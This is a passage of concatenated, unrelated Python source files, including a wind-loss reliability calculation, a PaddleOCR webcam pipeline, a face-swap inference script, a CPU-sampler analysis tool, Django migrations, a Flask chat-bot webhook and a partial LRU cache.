        timef = end_time - start_time
        print('Time: ' + str(timef))
        Var = Var.T
        Vard = Vard.T
        Var = Var[0]
        Vard = Vard[0]
        rho = wind["rho"]
        Cd = wind["Cd"]
        L = columns["height"]
        ncolumns = columns["quantity"]
        building_area = building["height"] * building["width"]
        wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
        meanY = Stochastic.linear_mean_response(stiff, wind_force, a)
        financial_loss_rate = 0
        for j in range(self.ndof):
            up_crossing_rate = ((np.sqrt(Vard[j] / Var[j])) / (2 * np.pi)) * \
                               np.exp(-((B - meanY[j]) ** 2) / (2 * Var[j]))
            # h = 0.00001
            # Cf0 = CostFailure.cost_damage(b=B - h, col_size=size_col[j], L=L, ncolumns=ncolumns,
            #                               dry_wall_area=dry_wall_area)
            # Cf1 = CostFailure.cost_damage(b=B + h, col_size=size_col[j], L=L, ncolumns=ncolumns,
            #                               dry_wall_area=dry_wall_area)
            # Cf = abs((Cf1 - Cf0) / (2 * h))
            Cf = CostFailure.cost_damage(b=B, col_size=size_col[j], L=L, ncolumns=ncolumns,
                                         dry_wall_area=dry_wall_area)
            loss_rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av)  # gumbel, weibull
            financial_loss_rate = financial_loss_rate + 60 * 60 * 24 * 30 * 12 * (loss_rate)
        return financial_loss_rate
|
import os.path as path
from pathlib import Path
import csv
from datetime import datetime
import platform
# Absolute path of the repository's data/ folder (two levels above this file).
filepath = str(Path(__file__).parents[2])+'/data/'
def player_to_csv(player_entry, directory=None):
    """Append one player entry as a row of sheet_raw.csv.

    player_entry: mapping with 'discord', 'uplay', 'rank' and 'level' keys.
    directory: folder containing sheet_raw.csv; defaults to the module-level
        `filepath` data folder (keeps the original call signature working).

    Bug fix: the old code used strftime("%T") on the Windows branch, but
    "%T" is a glibc extension that the Windows C runtime does not support;
    "%H:%M:%S" is the portable equivalent, so the platform check is gone.
    """
    if directory is None:
        directory = filepath
    timestamp = datetime.now().strftime("%m/%d/%Y %H:%M:%S")
    row = [timestamp,
           player_entry['discord'],
           player_entry['uplay'],
           player_entry['rank'],
           player_entry['level']]
    # newline='' stops the csv module writing blank lines on Windows.
    with open(path.join(directory, 'sheet_raw.csv'), 'a+', newline='') as f:
        # Add the entry as the last row in the csv file.
        csv.writer(f).writerow(row)
def clear_csv(directory=None):
    """Truncate sheet_raw.csv down to its header row.

    directory: folder containing sheet_raw.csv; defaults to the module-level
        `filepath` data folder (keeps the original no-argument call working).

    Bug fix: the old code read the header from `filepath + 'sheet_raw.csv'`
    but wrote the truncated file to 'sheet_raw.csv' in the current working
    directory, so the real data file was never cleared. Both the read and
    the write now use the same path.
    """
    if directory is None:
        directory = filepath
    target = path.join(directory, 'sheet_raw.csv')
    with open(target, 'r', newline='') as f:
        # First row is the header; IndexError on an empty file, as before.
        header = list(csv.reader(f))[0]
    with open(target, 'w', newline='') as f:
        csv.writer(f).writerow(header)
|
import time
import torch
import os
from options.test_options import TestOptions
from data import create_dataset
from models import create_model
import random
from PIL import Image
import numpy as np
import glob
from torchvision import transforms
# Folders of 256x256 face images used as swap sources/targets.
input_folder = ["/root/FaceDataset/FFHQ/images256x256/", "/root/FaceDataset/celeba_hq/images256x256/"]
# Where raw outputs and side-by-side comparison strips are written.
output_folder = "./sample/output/"
output_visual_folder = "./sample/output_visual/"
# Checkpoint directory holding latest_net_{G,E,Z}.pth.
CKPTS = "./checkpoints/all-epochx"
# How many random (source, target) index pairs to draw (see loop below).
NUMBER_OF_COUPLE = 100
if __name__ == '__main__':
    opt = TestOptions().parse()  # get test options
    # hard-code some parameters for test
    opt.num_threads = 0   # test code only supports num_threads = 1
    opt.batch_size = 1    # test code only supports batch_size = 1
    opt.serial_batches = True  # disable data shuffling; comment this line if results on randomly chosen images are needed.
    opt.no_flip = True    # no flip; comment this line if results on flipped images are needed.
    opt.display_id = -1   # no visdom display; the test code saves the results to a HTML file.
    device = torch.device(f"cuda:{opt.gpu_ids[0]}" if torch.cuda.is_available() else 'cpu')
    model = create_model(opt)  # create a model given opt.model and other options
    # Load generator / encoder / Z-mapper weights from the checkpoint folder.
    model.netG.load_state_dict(torch.load(CKPTS + "/latest_net_G.pth", map_location=str(device)))
    model.netE.load_state_dict(torch.load(CKPTS + "/latest_net_E.pth", map_location=str(device)))
    model.netZ.load_state_dict(torch.load(CKPTS + "/latest_net_Z.pth", map_location=str(device)))
    model.setup(opt)  # regular setup: load and print networks; create schedulers
    model.eval()
    # model.freeze()  # run inference
    # Map input images into [-1, 1], the range the networks are trained on.
    transform = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
    ])
    list_source_img = []
    for i in input_folder:
        list_source_img.extend(glob.glob(i + "*.png"))
    # Independent random picks for sources and targets (indices may repeat
    # between the two lists).
    source_index_list = random.sample(range(0, len(list_source_img)), NUMBER_OF_COUPLE)
    target_index_list = random.sample(range(0, len(list_source_img)), NUMBER_OF_COUPLE)
    # NOTE(review): only the first of the NUMBER_OF_COUPLE sampled pairs is
    # processed (range(1)) — presumably a quick smoke test; confirm intent.
    for index in range(1):
        source_path = list_source_img[source_index_list[index]]
        target_path = list_source_img[target_index_list[index]]
        source_img_orgin = Image.open(source_path)
        target_img_orgin = Image.open(target_path)
        source_img = transform(source_img_orgin).unsqueeze(0).to(device)
        target_img = transform(target_img_orgin).unsqueeze(0).to(device)
        print(source_img.max(), source_img.min())
        start_time = time.time()
        with torch.no_grad():
            # NOTE(review): argument order is forward(target, source); the
            # result is read from model.fake — confirm against the model class.
            model.forward(target_img, source_img)
            output_img = model.fake
        print("Time: ", time.time() - start_time)
        # Undo the [-1, 1] normalization before saving.
        output_img = (output_img + 1) / 2.0
        output_path = os.path.basename(source_path)[:-4] + "to" + os.path.basename(target_path)[:-4]+".jpg"
        # print(output.max(), output.min())
        output_img = transforms.ToPILImage()(output_img.cpu().squeeze().clamp(0,1))
        output_img.save(output_folder + output_path)
        # Horizontal strip source | target | output for visual inspection.
        list_img = [source_img_orgin, target_img_orgin, output_img]
        imgs_comb = np.hstack(np.asarray(list_img))
        imgs_comb = Image.fromarray(imgs_comb)
        imgs_comb.save(output_visual_folder + output_path)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
# Python 2 only: force 'utf8' as the default string encoding. `reload` (as a
# builtin) and `sys.setdefaultencoding` do not exist on Python 3, where UTF-8
# text handling is built in — so guard the call instead of crashing with
# NameError at import time.
try:
    reload(sys)
    sys.setdefaultencoding('utf8')
except NameError:
    pass
__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(__dir__)
sys.path.append(os.path.abspath(os.path.join(__dir__, '../..')))
import tools.infer.utility as utility
from ppocr.utils.utility import initial_logger
logger = initial_logger()
import cv2
import tools.infer.predict_det as predict_det
import tools.infer.predict_rec as predict_rec
import tools.infer.predict_cls as predict_cls
import copy
import numpy as np
import math
import time
from ppocr.utils.utility import get_image_file_list, check_and_read_gif
from PIL import Image
from tools.infer.utility import draw_ocr
from tools.infer.utility import draw_ocr_box_txt
use_angle_cls = True
class TextSystem(object):
    """End-to-end OCR pipeline: text detection, optional per-crop rotation
    classification, then text recognition."""
    def __init__(self):
        self.text_detector = predict_det.TextDetector()
        self.text_recognizer = predict_rec.TextRecognizer()
        # Module-level flag: when set, crops go through the angle classifier
        # before recognition.
        self.use_angle_cls = use_angle_cls
        if self.use_angle_cls:
            self.text_classifier = predict_cls.TextClassifier()
    def get_rotate_crop_image(self, img, points):
        '''
        Perspective-warp the quadrilateral `points` (4x2 float32 corners) out
        of `img` into an axis-aligned rectangle sized by the quad's edge
        lengths. Crops much taller than wide (h/w >= 1.5) are rotated 90
        degrees so the text reads horizontally.

        Earlier axis-aligned crop implementation, kept for reference:
        img_height, img_width = img.shape[0:2]
        left = int(np.min(points[:, 0]))
        right = int(np.max(points[:, 0]))
        top = int(np.min(points[:, 1]))
        bottom = int(np.max(points[:, 1]))
        img_crop = img[top:bottom, left:right, :].copy()
        points[:, 0] = points[:, 0] - left
        points[:, 1] = points[:, 1] - top
        '''
        # Target width/height: the longer of each opposing edge pair.
        img_crop_width = int(
            max(
                np.linalg.norm(points[0] - points[1]),
                np.linalg.norm(points[2] - points[3])))
        img_crop_height = int(
            max(
                np.linalg.norm(points[0] - points[3]),
                np.linalg.norm(points[1] - points[2])))
        pts_std = np.float32([[0, 0], [img_crop_width, 0],
                              [img_crop_width, img_crop_height],
                              [0, img_crop_height]])
        M = cv2.getPerspectiveTransform(points, pts_std)
        dst_img = cv2.warpPerspective(
            img,
            M, (img_crop_width, img_crop_height),
            borderMode=cv2.BORDER_REPLICATE,
            flags=cv2.INTER_CUBIC)
        dst_img_height, dst_img_width = dst_img.shape[0:2]
        if dst_img_height * 1.0 / dst_img_width >= 1.5:
            # Tall crop: rotate so recognition sees horizontal text.
            dst_img = np.rot90(dst_img)
        return dst_img
    def print_draw_crop_rec_res(self, img_crop_list, rec_res):
        """Debug helper: dump every crop to ./output and print its result."""
        bbox_num = len(img_crop_list)
        for bno in range(bbox_num):
            cv2.imwrite("./output/img_crop_%d.jpg" % bno, img_crop_list[bno])
            print(bno, rec_res[bno])
    def __call__(self, img):
        """Run the full pipeline on an image.

        Returns (dt_boxes, rec_res): detected boxes in reading order and the
        per-box recognition results, or (None, None) when detection fails.
        """
        ori_im = img.copy()
        dt_boxes, elapse = self.text_detector(img)
        print("dt_boxes num : {}, elapse : {}".format(len(dt_boxes), elapse))
        if dt_boxes is None:
            return None, None
        img_crop_list = []
        dt_boxes = sorted_boxes(dt_boxes)
        for bno in range(len(dt_boxes)):
            # Work on a copy of the box so dt_boxes stays unmodified.
            tmp_box = copy.deepcopy(dt_boxes[bno])
            img_crop = self.get_rotate_crop_image(ori_im, tmp_box)
            img_crop_list.append(img_crop)
        if self.use_angle_cls:
            # The classifier may rotate crops in place before recognition.
            img_crop_list, angle_list, elapse = self.text_classifier(
                img_crop_list)
            print("cls num : {}, elapse : {}".format(
                len(img_crop_list), elapse))
        rec_res, elapse = self.text_recognizer(img_crop_list)
        print("rec_res num : {}, elapse : {}".format(len(rec_res), elapse))
        # self.print_draw_crop_rec_res(img_crop_list, rec_res)
        return dt_boxes, rec_res
def sorted_boxes(dt_boxes):
    """
    Order detected text boxes top-to-bottom, then left-to-right.
    args:
        dt_boxes(array): detected text boxes with shape [4, 2]
    return:
        sorted boxes(array) with shape [4, 2]
    """
    boxes = sorted(dt_boxes, key=lambda box: (box[0][1], box[0][0]))
    # One bubble pass: neighbours whose top edges are within 10px are treated
    # as the same text line and ordered by their left edge.
    for idx in range(dt_boxes.shape[0] - 1):
        same_line = abs(boxes[idx + 1][0][1] - boxes[idx][0][1]) < 10
        if same_line and boxes[idx + 1][0][0] < boxes[idx][0][0]:
            boxes[idx], boxes[idx + 1] = boxes[idx + 1], boxes[idx]
    return boxes
def point_offset(_boxes):
    """Distance from the centre of a middle detected box to the point (320, 240).

    _boxes: sequence of text boxes, each a 4x2 array of corner points.
    Returns the Euclidean distance between the centre of box number
    round(0.5 * len(_boxes)) and (320, 240) — presumably the frame centre of
    a 640x480 capture — or None when _boxes is empty (callers must handle
    the None).

    Fix: removed a dead no-op statement (`len(_boxes)` on its own line).
    """
    if len(_boxes) > 0:
        # Pick the middle box; round() uses banker's rounding, matching the
        # original behavior exactly.
        l = round(0.5 * len(_boxes))
        dt_boxes = np.array(_boxes)
        box = dt_boxes[l, :]
        # Centre of the box diagonal: corner 0 and corner 2 are opposite.
        p0 = box[0, :]
        p2 = box[2, :]
        center_x = (p0[0] + p2[0]) * 0.5
        center_y = (p0[1] + p2[1]) * 0.5
        offset = ((center_x - 320) ** 2 + (center_y - 240) ** 2) ** 0.5
        return offset
# Open the default webcam once at import time; main() reads frames from it.
capture = cv2.VideoCapture(0)
def main():
    """Grab webcam frames in a loop and run OCR on each one, showing the
    mirrored feed in a window.

    Fix: TextSystem used to be constructed INSIDE the capture loop, which
    rebuilt the detector/recognizer/classifier models on every single frame;
    it is loop-invariant and is now created once before the loop.
    """
    #image_file_list = get_image_file_list(args.image_dir)
    text_sys = TextSystem()  # heavy model construction: do it once, not per frame
    while True:
        ref, frame = capture.read()
        # Copy for display: the display copy is mirrored horizontally, the
        # OCR input is flipped vertically (as in the original code).
        img = frame.copy()
        if ref:
            frame = cv2.flip(frame, 0)
            img = cv2.flip(img, 1)
        frame = np.array(frame)
        #img = cv2.imread(frame)
        #starttime = time.time()
        dt_boxes, rec_res = text_sys(frame)
        #elapse = time.time() - starttime
        #logger.info("Predict time of %s: %.3fs" % (frame, elapse))
        for text, score in rec_res:
            logger.info("{}, {:.3f}".format(text, score))
        cv2.imshow("video", img)
        cv2.waitKey(50)
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
"""Example Box local settings file. Copy this file to local.py and change
these settings.
"""
# Get an app key and secret at https://www.box.com/developers/apps
# OAuth credentials for the Box app; fill these in your local.py copy and
# never commit the real values.
BOX_KEY = None
BOX_SECRET = None
|
import struct
import subprocess
import bisect
import collections
# Packed on-disk layout of one sample record (see SamplerFile field indices).
SAMP = struct.Struct("IIQ4QIIQ")
class SamplerFile(object):
    """Reader for a binary sampler dump: a CPU count, a per-CPU
    (offset, length) segment table, then fixed-size SAMP records per CPU.

    NOTE(review): Python 2 only — uses `basestring`, `file()`, `xrange` and
    integer `/` division; would need porting to run on Python 3.
    """
    NTRACE = 4
    # Field indices into an unpacked SAMP tuple.
    FLAGS, COUNT, RIP, TRACE0 = range(4)
    LATENCY, SOURCE, LOAD_ADDRESS = range(TRACE0+NTRACE, TRACE0+NTRACE+3)
    def __init__(self, fp):
        """Open the dump from a path or an already-open binary file object."""
        if isinstance(fp, basestring):
            fp = file(fp, "rb")
        self.__fp = fp
        # Read CPUs
        self.ncpu, = struct.unpack("Q", fp.read(8))
        # Per-CPU (file offset, byte length) of that CPU's sample segment.
        self.__segments = []
        cpuinfo = struct.Struct("QQ")
        for cpu in range(self.ncpu):
            self.__segments.append(cpuinfo.unpack(fp.read(cpuinfo.size)))
    def read_cpu(self, cpu):
        """Return the list of unpacked SAMP tuples for `cpu` ([] if out of range)."""
        if cpu < 0 or cpu >= self.ncpu:
            return []
        start, length = self.__segments[cpu]
        fp = self.__fp
        fp.seek(start)
        count = length / SAMP.size  # Python 2 integer division
        res = [None] * count
        for i in xrange(count):
            res[i] = SAMP.unpack(fp.read(SAMP.size))
        return res
class Symbols(object):
    """Symbol table for an object file, parsed from `nm -Cn` output
    (demangled, sorted by address).

    NOTE(review): written for Python 2 — on Python 3, check_output returns
    bytes, so the parsing below would need decoding first.
    """
    def __init__(self, obj):
        # Parallel lists: __addrs[i] is the start address of __info[i], which
        # holds (symbol type letter, demangled name).
        self.__addrs = []
        self.__info = []
        for info in subprocess.check_output(["nm", "-Cn", obj]).splitlines():
            parts = info.split(None, 2)
            self.__addrs.append(int(parts[0], 16))
            self.__info.append((parts[1], parts[2]))
    def lookup(self, addr):
        """Return the Symbol covering `addr` (name=None when out of range)."""
        # Rightmost symbol whose start address is <= addr.
        i = bisect.bisect_right(self.__addrs, addr) - 1
        if i < 0 or i == len(self.__addrs) - 1:
            # Before the first symbol, or at/after the last one: unknown.
            return Symbol(addr, None, None)
        return Symbol(addr, self.__info[i][1], self.__addrs[i])
class Symbol(collections.namedtuple("Symbol", "addr name base")):
    """An address resolved against a symbol table: the address itself, the
    symbol name (or None when unknown) and the symbol's base address."""
    def __str__(self):
        if not self.name:
            # Unknown symbol: render the raw address, zero-padded.
            return "%#016x" % self.addr
        delta = self.addr - self.base
        if delta == 0:
            return self.name
        return "%s+%#x" % (self.name, delta)
class Addr2line(object):
    """Cached pc -> source-frame resolver backed by a long-running
    `addr2line -Cfsie` process (demangle, show functions, basenames only,
    expand inlined frames).

    NOTE(review): Python 2 only — uses the `print >> file` statement syntax,
    which is a SyntaxError on Python 3.
    """
    def __init__(self, obj):
        self.__p = subprocess.Popen(["addr2line", "-Cfsie", obj],
                                    stdin=subprocess.PIPE,
                                    stdout=subprocess.PIPE)
        self.__cache = {}  # pc -> list of Frame records
    def lookup(self, pc):
        """Return the list of Frames for `pc` (several when inlined)."""
        if pc in self.__cache:
            return self.__cache[pc]
        print >> self.__p.stdin, "%#x" % pc
        # Add a dummy record so we can detect termination
        print >> self.__p.stdin
        frames = []
        self.__cache[pc] = frames
        while True:
            # addr2line -f emits two lines per frame: function, then file:line.
            func = self.__p.stdout.readline().strip()
            source = self.__p.stdout.readline().strip()
            if len(frames) and func == "??":
                # Found dummy record
                break
            fname, line = source.split(":")
            line = int(line)
            frames.append(Frame(pc, func, fname, line))
            # Subsequent (inlined-parent) frames get pc 0; Frame.__str__
            # renders them as "(inlined by)".
            pc = 0
        return frames
class Frame(collections.namedtuple("Frame", "pc func fname line")):
    """One resolved stack frame: pc (0 marks an inlined frame), function
    name, source file name and line number."""
    def __str__(self):
        # Inlined frames carry pc == 0 and get a textual marker instead of
        # an address, padded to the same 16-character width.
        label = "%016x" % self.pc if self.pc else "%-16s" % "(inlined by)"
        return "%s %s:%d %s" % (label, self.fname, self.line, self.func)
class Histogram(object):
    """Counter-backed histogram of integer weights with running
    min/max/mean, renderable as a one-line unicode sparkline.

    NOTE(review): Python 2 only — uses `unichr`, `u""` literals, a list
    result from map(), and integer division in `mean` and in the bar-height
    scaling.
    """
    def __init__(self):
        self.__counts = collections.Counter()  # weight value -> sample count
        self.min = self.max = self.mean = None
        self.samples = self.weight = 0
    def add(self, weight, count=1):
        """Record `count` samples of the given weight and update the stats."""
        self.__counts[weight] += count
        if self.min == None:
            # First sample seen.
            self.min = self.max = weight
        elif weight < self.min:
            self.min = weight
        elif weight > self.max:
            self.max = weight
        self.samples += count
        self.weight += weight * count
        # Integer division under Python 2 when both operands are ints.
        self.mean = self.weight / self.samples
    def to_line(self, width = 72, right = None, label = True):
        """Render the histogram as a one-line unicode block-character chart.

        width: total character budget; right: force the right-edge value
        (defaults to max(0, self.max)); label: include numeric labels for
        nonzero edges.
        """
        if self.min == None:
            # Empty histogram: a blank line of the requested width.
            return " " * width
        # U+2581..U+2588: the 1/8 through 8/8 vertical block characters.
        CHARS = map(unichr, range(0x2581, 0x2589))
        left = min(0, self.min)
        if right is None:
            right = max(0, self.max)
        if left == right:
            # Degenerate range: one full bar between the two labels.
            return "%s %s %s" % (self.min, CHARS[-1], self.max)
        leftLabel = (str(left) + " ") if label and left != 0 else ""
        rightLabel = (" " + str(right)) if label and right != 0 else ""
        width = max(width - len(leftLabel) - len(rightLabel), 1)
        bucket_width = float(right - left) / width
        buckets = [0] * width
        for weight, count in self.__counts.items():
            buckets[min(int((weight - left) / bucket_width),
                        width - 1)] += count
        maxbucket = max(buckets)
        res = []
        for b in buckets:
            if b == 0:
                res.append(u" ")
            else:
                # Scale the bucket count to one of the 8 block heights.
                res.append(CHARS[min(b * len(CHARS) / maxbucket, len(CHARS)-1)])
        return "%s%s%s" % (leftLabel, "".join(res), rightLabel)
class HistTree(object):
    """Histogram aggregated over a tree of paths: each node keeps the
    cumulative histogram of every sample added at or below it.

    NOTE(review): Python 2 only -- ``items_sorted`` uses a
    tuple-unpacking lambda, a syntax error on Python 3.
    """
    def __init__(self, parent=None):
        self.__parent = parent
        # Children keyed by path component.
        self.__hists = {}
        self.__my_hist = Histogram()
    def add(self, path, weight, count=1):
        """Add a sample along ``path`` (a sequence of keys), updating this
        node and recursing into one child per path component."""
        self.__my_hist.add(weight, count)
        if len(path):
            key = path[0]
            if key not in self.__hists:
                self.__hists[key] = HistTree(self)
            self.__hists[key].add(path[1:], weight, count)
    @property
    def hist(self):
        """Return the cumulative histogram of all children."""
        return self.__my_hist
    @property
    def parent(self):
        # Parent HistTree node, or None at the root.
        return self.__parent
    @property
    def fraction_of_parent(self):
        """Return the fraction of the parent's weight that belongs to
        the histogram tree rooted at self."""
        return float(self.hist.weight) / self.parent.hist.weight
    def __getitem__(self, key):
        # Child lookup by path component.
        return self.__hists[key]
    def items_sorted(self, reverse=False):
        """Return a list of (key, hist_tree) children sorted by the
        cumulative weight of hist_tree."""
        return sorted(self.__hists.items(),
                      key=lambda (k,ht): ht.hist.weight,
                      reverse=reverse)
# See Intel SDM Volume 3, table 18-13, and
# https://lkml.org/lkml/2013/1/24/302
# Human-readable decodings of the load-latency data-source field, indexed
# by the encoded value.
LL_SOURCE_STR = [
    "unknown L3 miss",
    "L1 hit",
    "fill buffer hit",
    "L2 hit",
    "L3 hit, no snoop",
    "L3 hit, snoop clean",
    "L3 hit, snoop dirty",
    "reserved 0x7",
    "L3 miss, snoop hit",
    "reserved 0x9",
    "L3 miss, local DRAM, shared",
    "L3 miss, remote DRAM, shared",
    "L3 miss, local DRAM, exclusive",
    "L3 miss, remote DRAM, exclusive",
    "I/O memory",
    "un-cacheable memory"]
def ll_source_str(source):
    """Decode a load-latency source encoding into a readable string."""
    if 0 <= source < len(LL_SOURCE_STR):
        return LL_SOURCE_STR[source]
    return "unknown source %#x" % source
def self_less():
    """Pipe this process's stdout through a pager.

    Forks: the parent exec()s ``less`` reading the pipe on its stdin,
    while the child (this script) continues running with stdout
    redirected into the pipe.  No-op when stdout is not a tty.
    """
    import os, signal
    if not os.isatty(1):
        return
    r, w = os.pipe()
    if os.fork() > 0:
        # Parent: become the pager, reading the pipe as stdin.
        os.dup2(r, 0)
        os.close(w)
        # Make sure less doesn't exit when we do
        signal.signal(signal.SIGCHLD, signal.SIG_IGN)
        try:
            os.execlp("less", "less", "-SFR")
        except OSError:
            # BUG FIX: exec*() requires argv[0] in addition to the file to
            # run -- os.execlp("cat") raised instead of falling back.
            os.execlp("cat", "cat")
    # Child: continue the program with stdout writing into the pipe.
    os.close(r)
    os.dup2(w, 1)
    os.close(w)
    # Python ignores SIGPIPE by default, but we want to exit
    # immediately when less exits, like a good UNIX process
    signal.signal(signal.SIGPIPE, signal.SIG_DFL)
|
from __future__ import absolute_import
from django.utils.translation import ugettext_lazy as _
# Product-tour ("guide") definitions, keyed by guide id.  Each guide names
# the page it runs on, the DOM targets it needs, and its ordered steps.
GUIDES = {
    'issue': {
        'id': 1,
        'page': 'issue',
        # Text of the link that launches the tour.
        'cue': _('Click here for a tour of the issue page'),
        # The tour is only offered when these targets exist on the page.
        'required_targets': ['exception'],
        'steps': [
            {
                'title': _('1. Stacktrace'),
                'message': _(
                    'See which line in your code caused the error and the entire call '
                    'stack at that point.'),
                'target': 'exception',
            },
            {
                'title': _('2. Breadcrumbs'),
                # NOTE(review): this sentence appears truncated ("...and
                # record .").  Left as-is because it is a translated,
                # user-facing string -- confirm intended wording upstream.
                'message': _(
                    'See the events that happened leading up to the error, which often provides '
                    'insight into what caused the error. This includes things like HTTP requests, '
                    'database calls, and any other custom data you record. Breadcrumbs integrate '
                    'seamlessly with many popular web frameworks and record .'),
                'target': 'breadcrumbs',
            },
            {
                'title': _('3. Additional Data'),
                'message': _(
                    'Send custom data with every error, and attach tags to them that you can '
                    'later search and filter by.'),
                'target': 'extra',
            },
        ],
    },
}
|
# -*- coding: utf-8 -*-
"""
A mock database driver module.
"""
class MockConnection(object):
    r"""
    A mock Connection object.

    :param \**kwargs: Accepts anything; stored on ``self.kwargs``.
    """
    def __init__(self, **kwargs):
        self.kwargs = kwargs
        # Flag tracking whether the connection is still "open".
        self.open = True

    def close(self):
        """Mark the connection as closed."""
        self.open = False

    def commit(self):
        """Pretend to commit the transaction; returns a MockCommit sentinel."""
        return MockCommit()

    def cursor(self, cursorclass=None, **kwargs):
        r"""
        Return a cursor of the requested class (MockCursor by default).

        :param \**kwargs: Accepts anything.
        """
        klass = MockCursor if cursorclass is None else cursorclass
        return klass(self)
class MockCursor(object):
    """
    A mock Cursor object bound to a connection.

    :param MockConnection connection: A MockConnection object.
    """
    def __init__(self, connection):
        self.connection = connection

    def close(self):
        """Drop the connection reference, "closing" the cursor."""
        self.connection = None

    def execute(self, query, *args):
        """Accept and ignore any query."""
        return None
class MockCommit(object):
    """
    A mock Commit object. Strictly used for testing methods involving commits.

    All instances compare equal to each other (and only to each other).
    """
    def __eq__(self, other):
        return type(self) == type(other)

    # BUG FIX: defining __eq__ suppresses the inherited __hash__, which
    # made instances unhashable on Python 3; restore a hash consistent
    # with __eq__ (all equal instances share one hash).
    def __hash__(self):
        return hash(type(self))
def connect(**kwargs):
    r"""
    Return a mock Connection object.

    :param \**kwargs: Accepts anything, which is passed to the Connection
        object.
    """
    connection = MockConnection(**kwargs)
    return connection
|
# Generated by Django 3.2.2 on 2021-05-09 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema migration: creates the Parliament1 table."""
    initial = True
    dependencies = []
    operations = [
        migrations.CreateModel(
            name="Parliament1",
            fields=[
                ("id", models.AutoField(primary_key=True, serialize=False)),
                ("name", models.CharField(max_length=60)),
                ("date_born", models.DateField(blank=True, null=True)),
                ("place_born", models.CharField(blank=True, max_length=50, null=True)),
                ("profession", models.CharField(blank=True, max_length=80, null=True)),
                ("lang", models.CharField(blank=True, max_length=70, null=True)),
                ("party", models.CharField(blank=True, max_length=80, null=True)),
                ("email", models.CharField(blank=True, max_length=80, null=True)),
                # NOTE(review): max_length has no database effect on
                # TextField; kept as generated to match migration history.
                ("url", models.TextField(blank=True, max_length=15, null=True)),
                ("pp", models.TextField(blank=True, max_length=10, null=True)),
                ("dob", models.TextField(blank=True, max_length=15, null=True)),
            ],
            options={
                # Explicit table name instead of the app_model default.
                "db_table": "Parliament1",
            },
        ),
    ]
|
from flask import Flask, request
from pprint import pprint
# Flask application exposing the bot's webhook endpoints.
app = Flask(__name__)
# Bot instance; expected to be assigned by the embedding application
# before any request arrives -- TODO confirm how it is injected.
bot = None
@app.route("/", methods=[ 'GET', 'POST' ])
def index():
    """Main webhook: look up the incoming message and dispatch it to the
    bot's registered text/file handlers.

    NOTE(review): assumes ``bot`` is set before requests arrive, and that
    messages without 'files' always carry 'text' (otherwise the final
    elif raises KeyError) -- confirm against the webhook payloads.
    """
    json_data = request.get_json()
    message_id = json_data[ "data" ][ "id" ]
    message_info = bot.get_message_details( message_id=message_id ).json()
    # Never respond to the bot's own messages (would loop forever).
    if message_info[ "personId" ] == bot.get_own_details().json()[ 'id' ]:
        return "cannot respond to my own messages"
    if 'files' in message_info:
        if 'text' in message_info:
            # Exact text match takes priority, then the '*' catch-all.
            if message_info['text'] in bot.hears_file_to_function:
                message_text = message_info['text']
                files = message_info['files']
                bot.hears_file_to_function[message_text](files=message_info['files'], room_id=message_info['roomId'])
                return "Works"
            elif '*' in bot.hears_file_to_function:
                bot.hears_file_to_function['*'](files=message_info['files'], room_id=message_info['roomId'])
                return "Defatult file action"
            else:
                # No handler; falls through to the final return below.
                print("Default response for file sent with text not set")
        elif bot.default_attachment is not None:
            bot.default_attachment(files=message_info['files'], room_id=message_info['roomId'])
            return "Works"
        else:
            print("No action set for receiving the file with text '{}'".format( message_info['text'] ))
    elif message_info[ "text" ].strip() != "" and message_info[ "text" ] in bot.hears_to_function:
        message_text = message_info[ "text" ]
        bot.hears_to_function[ message_text ]( room_id=message_info["roomId"] )
    elif message_info["text"].strip() != "" and message_info[ "text" ] not in bot.hears_to_function:
        # Unrecognized text falls back to the '*' handler.
        bot.hears_to_function[ "*" ]( room_id=message_info["roomId"] )
    return "successfully responded"
@app.route("/attachment-response", methods=["GET", "POST"])
def attachment_response():
    """Webhook for attachment (form) submissions: dispatch to the callback
    registered for the original message, or apologize in the room."""
    json_data = request.get_json()
    message_id = json_data['data']['messageId']
    message_dict = bot.get_attachment_response(json_data['data']['id'])
    if message_id in bot.attachment_response_to_function:
        # The handler's return value was never used; don't bind it.
        bot.attachment_response_to_function[message_id](message_dict)
    else:
        room_id = message_dict['roomId']
        bot.send_message(room_id=room_id, text='The form could not be submitted. You may need to request for the form again then submit. Sorry for the inconvenience :)')
    return "attachment response received"
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-28 03:29
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Updates the comic_account choice list and makes transcript nullable."""
    dependencies = [
        ('comic', '0003_auto_20170128_0217'),
    ]
    operations = [
        migrations.AlterField(
            model_name='comic',
            name='comic_account',
            field=models.CharField(choices=[('benco', 'Benco'), ('bencomic', 'Bencomic'), ('lemmy', 'Lemmy'), ('mr-shapiro', 'Mr. Shapiro'), ('nomad', "Nomad's ZZT Comics"), ('kaddar', 'Yellow Boarders'), ('frost', 'Frost'), ('revvy', 'The Prophesies of Revvy'), ('zamros', 'Zamros: The Comic'), ('ubgs', "Ol' Uncle Bo's Gamblin' Shack")], max_length=10),
        ),
        migrations.AlterField(
            model_name='comic',
            name='transcript',
            field=models.TextField(blank=True, default=None, null=True),
        ),
    ]
|
11110000
00001111
11110000
00001111
11110000
11111111
11000011
00111100
|
class LRUCache:
    """Least-recently-used cache: a dict for O(1) key lookup plus a
    doubly linked list tracking recency order."""
    def __init__(self, max_size=128):
        self._max_size = max_size
        self._cache_by_key = {}
        self._cache_by_use = _LRUCacheList()

    def query(self, key):
        """Return the cached value for ``key`` (marking it most recently
        used), or None when absent."""
        if key not in self._cache_by_key:
            return None
        node = self._cache_by_key[key]
        self._cache_by_use.move_to_front(node)
        return node.value

    def add(self, key, value):
